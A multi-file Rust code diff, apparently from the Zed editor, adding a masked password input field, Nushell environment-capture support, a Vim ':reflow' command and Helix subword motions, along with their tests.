@@ -63,6 +66,7 @@ impl InputField {
min_width: px(192.).into(),
tab_index: None,
tab_stop: true,
+ masked: None,
}
}
@@ -96,6 +100,12 @@ impl InputField {
self
}
+ /// Sets this field as a masked/sensitive input (e.g., for passwords or API keys).
+ pub fn masked(mut self, masked: bool) -> Self {
+ self.masked = Some(masked);
+ self
+ }
+
pub fn is_empty(&self, cx: &App) -> bool {
self.editor().text(cx).trim().is_empty()
}
@@ -115,12 +125,20 @@ impl InputField {
pub fn set_text(&self, text: &str, window: &mut Window, cx: &mut App) {
self.editor().set_text(text, window, cx)
}
+
+ pub fn set_masked(&self, masked: bool, window: &mut Window, cx: &mut App) {
+ self.editor().set_masked(masked, window, cx)
+ }
}
impl Render for InputField {
fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
let editor = self.editor.clone();
+ if let Some(masked) = self.masked {
+ self.editor.set_masked(masked, window, cx);
+ }
+
let theme_color = cx.theme().colors();
let style = InputFieldStyle {
@@ -172,7 +190,31 @@ impl Render for InputField {
this.gap_1()
.child(Icon::new(icon).size(IconSize::Small).color(Color::Muted))
})
- .child(self.editor.render(window, cx)),
+ .child(self.editor.render(window, cx))
+ .when_some(self.masked, |this, is_masked| {
+ this.child(
+ IconButton::new(
+ "toggle-masked",
+ if is_masked {
+ IconName::Eye
+ } else {
+ IconName::EyeOff
+ },
+ )
+ .icon_size(IconSize::Small)
+ .icon_color(Color::Muted)
+ .tooltip(Tooltip::text(if is_masked { "Show" } else { "Hide" }))
+ .on_click(cx.listener(
+ |this, _, window, cx| {
+ if let Some(ref mut masked) = this.masked {
+ *masked = !*masked;
+ this.editor.set_masked(*masked, window, cx);
+ cx.notify();
+ }
+ },
+ )),
+ )
+ }),
)
}
}
@@ -21,7 +21,7 @@ test-support = ["git2", "rand", "util_macros"]
anyhow.workspace = true
async_zip.workspace = true
collections.workspace = true
-dunce = "1.0"
+dunce.workspace = true
futures-lite.workspace = true
futures.workspace = true
globset.workspace = true
@@ -5,7 +5,7 @@ use std::{
use crate::paths::SanitizedPath;
use itertools::Itertools;
-use serde::{Deserialize, Deserializer, Serialize, Serializer};
+use serde::{Deserialize, Serialize};
/// A list of absolute paths, in a specific order.
///
@@ -23,7 +23,7 @@ pub struct PathList {
order: Arc<[usize]>,
}
-#[derive(Debug)]
+#[derive(Debug, Serialize, Deserialize)]
pub struct SerializedPathList {
pub paths: String,
pub order: String,
@@ -119,19 +119,6 @@ impl PathList {
}
}
-impl Serialize for PathList {
- fn serialize<S: Serializer>(&self, serializer: S) -> Result<S::Ok, S::Error> {
- self.paths.serialize(serializer)
- }
-}
-
-impl<'de> Deserialize<'de> for PathList {
- fn deserialize<D: Deserializer<'de>>(deserializer: D) -> Result<Self, D::Error> {
- let paths: Vec<PathBuf> = Vec::deserialize(deserializer)?;
- Ok(PathList::new(&paths))
- }
-}
-
#[cfg(test)]
mod tests {
use super::*;
@@ -73,13 +73,27 @@ async fn capture_unix(
command.arg("-l");
}
}
+
+ match shell_kind {
+ // Nushell does not allow non-interactive login shells.
+ // Instead of doing "-l -i -c '<command>'"
+ // use "-l -e '<command>; exit'" instead
+ ShellKind::Nushell => command.arg("-e"),
+ _ => command.args(["-i", "-c"]),
+ };
+
// cd into the directory, triggering directory specific side-effects (asdf, direnv, etc)
command_string.push_str(&format!("cd '{}';", directory.display()));
if let Some(prefix) = shell_kind.command_prefix() {
command_string.push(prefix);
}
command_string.push_str(&format!("{} --printenv {}", zed_path, redir));
- command.args(["-i", "-c", &command_string]);
+
+ if let ShellKind::Nushell = shell_kind {
+ command_string.push_str("; exit");
+ }
+
+ command.arg(&command_string);
super::set_pre_exec_to_start_new_session(&mut command);
@@ -28,7 +28,7 @@ use std::{
sync::OnceLock,
time::Instant,
};
-use task::{HideStrategy, RevealStrategy, SpawnInTerminal, TaskId};
+use task::{HideStrategy, RevealStrategy, SaveStrategy, SpawnInTerminal, TaskId};
use ui::ActiveTheme;
use util::{
ResultExt,
@@ -47,6 +47,7 @@ use crate::{
search::{FindCommand, ReplaceCommand, Replacement},
},
object::Object,
+ rewrap::Rewrap,
state::{Mark, Mode},
visual::VisualDeleteLine,
};
@@ -1725,6 +1726,15 @@ fn generate_commands(_: &App) -> Vec<VimCommand> {
)
.range(wrap_count),
VimCommand::new(("j", "oin"), JoinLines).range(select_range),
+ VimCommand::new(("reflow", ""), Rewrap { line_length: None })
+ .range(select_range)
+ .args(|_action, args| {
+ args.parse::<usize>().map_or(None, |length| {
+ Some(Box::new(Rewrap {
+ line_length: Some(length),
+ }))
+ })
+ }),
VimCommand::new(("fo", "ld"), editor::actions::FoldSelectedRanges).range(act_on_range),
VimCommand::new(("foldo", "pen"), editor::actions::UnfoldLines)
.bang(editor::actions::UnfoldRecursive)
@@ -2479,6 +2489,7 @@ impl ShellExec {
show_summary: false,
show_command: false,
show_rerun: false,
+ save: SaveStrategy::default(),
};
let task_status = workspace.spawn_in_terminal(spawn_in_terminal, window, cx);
@@ -3536,4 +3547,88 @@ mod test {
Mode::Normal,
);
}
+
+ #[gpui::test]
+ async fn test_reflow(cx: &mut TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+
+ cx.update_editor(|editor, _window, cx| {
+ editor.set_hard_wrap(Some(10), cx);
+ });
+
+ cx.set_state(
+ indoc! {"
+ ˇ0123456789 0123456789
+ "},
+ Mode::Normal,
+ );
+
+ cx.simulate_keystrokes(": reflow");
+ cx.simulate_keystrokes("enter");
+
+ cx.assert_state(
+ indoc! {"
+ 0123456789
+ ˇ0123456789
+ "},
+ Mode::Normal,
+ );
+
+ cx.set_state(
+ indoc! {"
+ ˇ0123456789 0123456789
+ "},
+ Mode::VisualLine,
+ );
+
+ cx.simulate_keystrokes("shift-v : reflow");
+ cx.simulate_keystrokes("enter");
+
+ cx.assert_state(
+ indoc! {"
+ 0123456789
+ ˇ0123456789
+ "},
+ Mode::Normal,
+ );
+
+ cx.set_state(
+ indoc! {"
+ ˇ0123 4567 0123 4567
+ "},
+ Mode::VisualLine,
+ );
+
+ cx.simulate_keystrokes(": reflow space 7");
+ cx.simulate_keystrokes("enter");
+
+ cx.assert_state(
+ indoc! {"
+ ˇ0123
+ 4567
+ 0123
+ 4567
+ "},
+ Mode::Normal,
+ );
+
+ // Assert that, if `:reflow` is invoked with an invalid argument, it
+ // does not actually have any effect in the buffer's contents.
+ cx.set_state(
+ indoc! {"
+ ˇ0123 4567 0123 4567
+ "},
+ Mode::VisualLine,
+ );
+
+ cx.simulate_keystrokes(": reflow space a");
+ cx.simulate_keystrokes("enter");
+
+ cx.assert_state(
+ indoc! {"
+ ˇ0123 4567 0123 4567
+ "},
+ Mode::VisualLine,
+ );
+ }
}
@@ -12,6 +12,7 @@ use editor::{
};
use gpui::actions;
use gpui::{Context, Window};
+use itertools::Itertools as _;
use language::{CharClassifier, CharKind, Point};
use search::{BufferSearchBar, SearchOptions};
use settings::Settings;
@@ -36,6 +37,8 @@ actions!(
HelixInsert,
/// Appends at the end of the selection.
HelixAppend,
+ /// Inserts at the end of the current Helix cursor line.
+ HelixInsertEndOfLine,
/// Goes to the location of the last modification.
HelixGotoLastModification,
/// Select entire line or multiple lines, extending downwards.
@@ -64,6 +67,7 @@ pub fn register(editor: &mut Editor, cx: &mut Context<Vim>) {
Vim::action(editor, cx, Vim::helix_select_lines);
Vim::action(editor, cx, Vim::helix_insert);
Vim::action(editor, cx, Vim::helix_append);
+ Vim::action(editor, cx, Vim::helix_insert_end_of_line);
Vim::action(editor, cx, Vim::helix_yank);
Vim::action(editor, cx, Vim::helix_goto_last_modification);
Vim::action(editor, cx, Vim::helix_paste);
@@ -363,6 +367,56 @@ impl Vim {
}
}
+ /// When `reversed` is true (used with `helix_find_range_backward`), the
+ /// `left` and `right` characters are yielded in reverse text order, so the
+ /// camelCase transition check must be flipped accordingly.
+ fn subword_boundary_start(
+ ignore_punctuation: bool,
+ reversed: bool,
+ ) -> impl FnMut(char, char, &CharClassifier) -> bool {
+ move |left, right, classifier| {
+ let left_kind = classifier.kind_with(left, ignore_punctuation);
+ let right_kind = classifier.kind_with(right, ignore_punctuation);
+ let at_newline = (left == '\n') ^ (right == '\n');
+ let is_separator = |c: char| "_$=".contains(c);
+
+ let is_word = left_kind != right_kind && right_kind != CharKind::Whitespace;
+ let is_subword = (is_separator(left) && !is_separator(right))
+ || if reversed {
+ right.is_lowercase() && left.is_uppercase()
+ } else {
+ left.is_lowercase() && right.is_uppercase()
+ };
+
+ is_word || (is_subword && !right.is_whitespace()) || at_newline
+ }
+ }
+
+ /// When `reversed` is true (used with `helix_find_range_backward`), the
+ /// `left` and `right` characters are yielded in reverse text order, so the
+ /// camelCase transition check must be flipped accordingly.
+ fn subword_boundary_end(
+ ignore_punctuation: bool,
+ reversed: bool,
+ ) -> impl FnMut(char, char, &CharClassifier) -> bool {
+ move |left, right, classifier| {
+ let left_kind = classifier.kind_with(left, ignore_punctuation);
+ let right_kind = classifier.kind_with(right, ignore_punctuation);
+ let at_newline = (left == '\n') ^ (right == '\n');
+ let is_separator = |c: char| "_$=".contains(c);
+
+ let is_word = left_kind != right_kind && left_kind != CharKind::Whitespace;
+ let is_subword = (!is_separator(left) && is_separator(right))
+ || if reversed {
+ right.is_lowercase() && left.is_uppercase()
+ } else {
+ left.is_lowercase() && right.is_uppercase()
+ };
+
+ is_word || (is_subword && !left.is_whitespace()) || at_newline
+ }
+ }
+
pub fn helix_move_cursor(
&mut self,
motion: Motion,
@@ -387,6 +441,29 @@ impl Vim {
let mut is_boundary = Self::is_boundary_right(ignore_punctuation);
self.helix_find_range_backward(times, window, cx, &mut is_boundary)
}
+ // The subword motions implementation is based off of the same
+ // commands present in Helix itself, namely:
+ //
+ // * `move_next_sub_word_start`
+ // * `move_next_sub_word_end`
+ // * `move_prev_sub_word_start`
+ // * `move_prev_sub_word_end`
+ Motion::NextSubwordStart { ignore_punctuation } => {
+ let mut is_boundary = Self::subword_boundary_start(ignore_punctuation, false);
+ self.helix_find_range_forward(times, window, cx, &mut is_boundary)
+ }
+ Motion::NextSubwordEnd { ignore_punctuation } => {
+ let mut is_boundary = Self::subword_boundary_end(ignore_punctuation, false);
+ self.helix_find_range_forward(times, window, cx, &mut is_boundary)
+ }
+ Motion::PreviousSubwordStart { ignore_punctuation } => {
+ let mut is_boundary = Self::subword_boundary_end(ignore_punctuation, true);
+ self.helix_find_range_backward(times, window, cx, &mut is_boundary)
+ }
+ Motion::PreviousSubwordEnd { ignore_punctuation } => {
+ let mut is_boundary = Self::subword_boundary_start(ignore_punctuation, true);
+ self.helix_find_range_backward(times, window, cx, &mut is_boundary)
+ }
Motion::EndOfLine { .. } => {
// In Helix mode, EndOfLine should position cursor ON the last character,
// not after it. We therefore need special handling for it.
@@ -600,6 +677,34 @@ impl Vim {
});
}
+ /// Helix-specific implementation of `shift-a` that accounts for Helix's
+ /// selection model, where selecting a line with `x` creates a selection
+ /// from column 0 of the current row to column 0 of the next row, so the
+ /// default [`vim::normal::InsertEndOfLine`] would move the cursor to the
+ /// end of the wrong line.
+ fn helix_insert_end_of_line(
+ &mut self,
+ _: &HelixInsertEndOfLine,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.start_recording(cx);
+ self.switch_mode(Mode::Insert, false, window, cx);
+ self.update_editor(cx, |_, editor, cx| {
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.move_with(&mut |map, selection| {
+ let cursor = if !selection.is_empty() && !selection.reversed {
+ movement::left(map, selection.head())
+ } else {
+ selection.head()
+ };
+ selection
+ .collapse_to(motion::next_line_end(map, cursor, 1), SelectionGoal::None);
+ });
+ });
+ });
+ }
+
pub fn helix_replace(&mut self, text: &str, window: &mut Window, cx: &mut Context<Self>) {
self.update_editor(cx, |_, editor, cx| {
editor.transact(window, cx, |editor, window, cx| {
@@ -845,11 +950,22 @@ impl Vim {
self.update_editor(cx, |_vim, editor, cx| {
let snapshot = editor.snapshot(window, cx);
editor.change_selections(SelectionEffects::default(), window, cx, |s| {
+ let buffer = snapshot.buffer_snapshot();
+
s.select_anchor_ranges(
prior_selections
.iter()
.cloned()
- .chain(s.all_anchors(&snapshot).iter().map(|s| s.range())),
+ .chain(s.all_anchors(&snapshot).iter().map(|s| s.range()))
+ .sorted_by(|a, b| {
+ a.start
+ .cmp(&b.start, buffer)
+ .then_with(|| a.end.cmp(&b.end, buffer))
+ })
+ .dedup_by(|a, b| {
+ a.start.cmp(&b.start, buffer).is_eq()
+ && a.end.cmp(&b.end, buffer).is_eq()
+ }),
);
})
});
@@ -859,7 +975,7 @@ impl Vim {
#[cfg(test)]
mod test {
- use gpui::{UpdateGlobal, VisualTestContext};
+ use gpui::{KeyBinding, UpdateGlobal, VisualTestContext};
use indoc::indoc;
use project::FakeFs;
use search::{ProjectSearchView, project_search};
@@ -932,6 +1048,310 @@ mod test {
cx.assert_state("aa\n«ˇ »bb", Mode::HelixNormal);
}
+ #[gpui::test]
+ async fn test_next_subword_start(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Setup custom keybindings for subword motions so we can use the bindings
+ // in `simulate_keystroke`.
+ cx.update(|_window, cx| {
+ cx.bind_keys([KeyBinding::new(
+ "w",
+ crate::motion::NextSubwordStart {
+ ignore_punctuation: false,
+ },
+ None,
+ )]);
+ });
+
+ cx.set_state("ˇfoo.bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«fooˇ».bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo«.ˇ»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo.«barˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo(bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«fooˇ»(bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo«(ˇ»bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo(«barˇ»)", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo_bar_baz", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«foo_ˇ»bar_baz", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo_«bar_ˇ»baz", Mode::HelixNormal);
+
+ cx.set_state("ˇfooBarBaz", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«fooˇ»BarBaz", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo«Barˇ»Baz", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo;bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«fooˇ»;bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo«;ˇ»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo;«barˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇ<?php\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«<?ˇ»php\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?«phpˇ»\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n«$ˇ»someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n$«someˇ»Variable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n$some«Variable ˇ»= 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n$someVariable «= ˇ»2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n$someVariable = «2ˇ»;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n$someVariable = 2«;ˇ»", Mode::HelixNormal);
+ }
+
+ #[gpui::test]
+ async fn test_next_subword_end(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Setup custom keybindings for subword motions so we can use the bindings
+ // in `simulate_keystroke`.
+ cx.update(|_window, cx| {
+ cx.bind_keys([KeyBinding::new(
+ "e",
+ crate::motion::NextSubwordEnd {
+ ignore_punctuation: false,
+ },
+ None,
+ )]);
+ });
+
+ cx.set_state("ˇfoo.bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«fooˇ».bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo«.ˇ»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo.«barˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo(bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«fooˇ»(bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo«(ˇ»bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo(«barˇ»)", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo_bar_baz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«fooˇ»_bar_baz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo«_barˇ»_baz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo_bar«_bazˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇfooBarBaz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«fooˇ»BarBaz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo«Barˇ»Baz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("fooBar«Bazˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo;bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«fooˇ»;bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo«;ˇ»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo;«barˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇ<?php\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«<?ˇ»php\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?«phpˇ»\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n«$ˇ»someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n$«someˇ»Variable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n$some«Variableˇ» = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n$someVariable« =ˇ» 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n$someVariable =« 2ˇ»;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n$someVariable = 2«;ˇ»", Mode::HelixNormal);
+ }
+
+ #[gpui::test]
+ async fn test_previous_subword_start(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Setup custom keybindings for subword motions so we can use the bindings
+ // in `simulate_keystroke`.
+ cx.update(|_window, cx| {
+ cx.bind_keys([KeyBinding::new(
+ "b",
+ crate::motion::PreviousSubwordStart {
+ ignore_punctuation: false,
+ },
+ None,
+ )]);
+ });
+
+ cx.set_state("foo.barˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo.«ˇbar»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo«ˇ.»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇfoo».bar", Mode::HelixNormal);
+
+ cx.set_state("foo(bar)ˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo(bar«ˇ)»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo(«ˇbar»)", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo«ˇ(»bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇfoo»(bar)", Mode::HelixNormal);
+
+ cx.set_state("foo_bar_bazˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo_bar_«ˇbaz»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo_«ˇbar_»baz", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇfoo_»bar_baz", Mode::HelixNormal);
+
+ cx.set_state("foo;barˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo;«ˇbar»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo«ˇ;»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇfoo»;bar", Mode::HelixNormal);
+
+ cx.set_state("<?php\n\n$someVariable = 2;ˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n$someVariable = 2«ˇ;»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n$someVariable = «ˇ2»;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n$someVariable «ˇ= »2;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n$some«ˇVariable »= 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n$«ˇsome»Variable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n«ˇ$»someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?«ˇphp»\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇ<?»php\n\n$someVariable = 2;", Mode::HelixNormal);
+
+ cx.set_state("fooBarBazˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("fooBar«ˇBaz»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo«ˇBar»Baz", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇfoo»BarBaz", Mode::HelixNormal);
+ }
+
+ #[gpui::test]
+ async fn test_previous_subword_end(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Setup custom keybindings for subword motions so we can use the bindings
+ // in `simulate_keystrokes`.
+ cx.update(|_window, cx| {
+ cx.bind_keys([KeyBinding::new(
+ "g e",
+ crate::motion::PreviousSubwordEnd {
+ ignore_punctuation: false,
+ },
+ None,
+ )]);
+ });
+
+ cx.set_state("foo.barˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo.«ˇbar»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo«ˇ.»bar", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇfoo».bar", Mode::HelixNormal);
+
+ cx.set_state("foo(bar)ˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo(bar«ˇ)»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo(«ˇbar»)", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo«ˇ(»bar)", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇfoo»(bar)", Mode::HelixNormal);
+
+ cx.set_state("foo_bar_bazˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo_bar«ˇ_baz»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo«ˇ_bar»_baz", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇfoo»_bar_baz", Mode::HelixNormal);
+
+ cx.set_state("foo;barˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo;«ˇbar»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo«ˇ;»bar", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇfoo»;bar", Mode::HelixNormal);
+
+ cx.set_state("<?php\n\n$someVariable = 2;ˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n$someVariable = 2«ˇ;»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n$someVariable =«ˇ 2»;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n$someVariable«ˇ =» 2;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n$some«ˇVariable» = 2;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n$«ˇsome»Variable = 2;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n«ˇ$»someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?«ˇphp»\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇ<?»php\n\n$someVariable = 2;", Mode::HelixNormal);
+
+ cx.set_state("fooBarBazˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("fooBar«ˇBaz»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo«ˇBar»Baz", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇfoo»BarBaz", Mode::HelixNormal);
+ }
+
#[gpui::test]
async fn test_delete(cx: &mut gpui::TestAppContext) {
let mut cx = VimTestContext::new(cx, true).await;
@@ -1447,6 +1867,47 @@ mod test {
ˇ»line five"},
Mode::HelixNormal,
);
+
+ // Test selecting with an empty line below the current line
+ cx.set_state(
+ indoc! {"
+ line one
+ line twoˇ
+
+ line four
+ line five"},
+ Mode::HelixNormal,
+ );
+ cx.simulate_keystrokes("x");
+ cx.assert_state(
+ indoc! {"
+ line one
+ «line two
+ ˇ»
+ line four
+ line five"},
+ Mode::HelixNormal,
+ );
+ cx.simulate_keystrokes("x");
+ cx.assert_state(
+ indoc! {"
+ line one
+ «line two
+
+ ˇ»line four
+ line five"},
+ Mode::HelixNormal,
+ );
+ cx.simulate_keystrokes("x");
+ cx.assert_state(
+ indoc! {"
+ line one
+ «line two
+
+ line four
+ ˇ»line five"},
+ Mode::HelixNormal,
+ );
}
#[gpui::test]
@@ -1598,6 +2059,25 @@ mod test {
cx.assert_state("hello two «oneˇ» two «oneˇ» two «oneˇ»", Mode::HelixSelect);
}
+ #[gpui::test]
+ async fn test_helix_select_next_match_wrapping(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Three occurrences of "one". After selecting all three with `n n`,
+ // pressing `n` again wraps the search to the first occurrence.
+ // The prior selections (at higher offsets) are chained before the
+ // wrapped selection (at a lower offset), producing unsorted anchors
+ // that cause `rope::Cursor::summary` to panic with
+ // "cannot summarize backward".
+ cx.set_state("ˇhello two one two one two one", Mode::HelixSelect);
+ cx.simulate_keystrokes("/ o n e");
+ cx.simulate_keystrokes("enter");
+ cx.simulate_keystrokes("n n n");
+ // Should not panic; all three occurrences should remain selected.
+ cx.assert_state("hello two «oneˇ» two «oneˇ» two «oneˇ»", Mode::HelixSelect);
+ }
+
#[gpui::test]
async fn test_helix_substitute(cx: &mut gpui::TestAppContext) {
let mut cx = VimTestContext::new(cx, true).await;
@@ -1848,4 +2328,51 @@ mod test {
Mode::HelixSelect,
);
}
+
+ #[gpui::test]
+ async fn test_helix_insert_end_of_line(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Ensure that, when lines are selected using `x`, pressing `shift-a`
+ // actually puts the cursor at the end of the selected lines and not at
+ // the end of the line below.
+ cx.set_state(
+ indoc! {"
+ line oˇne
+ line two"},
+ Mode::HelixNormal,
+ );
+
+ cx.simulate_keystrokes("x");
+ cx.assert_state(
+ indoc! {"
+ «line one
+ ˇ»line two"},
+ Mode::HelixNormal,
+ );
+
+ cx.simulate_keystrokes("shift-a");
+ cx.assert_state(
+ indoc! {"
+ line oneˇ
+ line two"},
+ Mode::Insert,
+ );
+
+ cx.set_state(
+ indoc! {"
+ line «one
+ lineˇ» two"},
+ Mode::HelixNormal,
+ );
+
+ cx.simulate_keystrokes("shift-a");
+ cx.assert_state(
+ indoc! {"
+ line one
+ line twoˇ"},
+ Mode::Insert,
+ );
+ }
}
@@ -2,11 +2,19 @@ use std::ops::Range;
use editor::{DisplayPoint, MultiBufferOffset, display_map::DisplaySnapshot};
use gpui::Context;
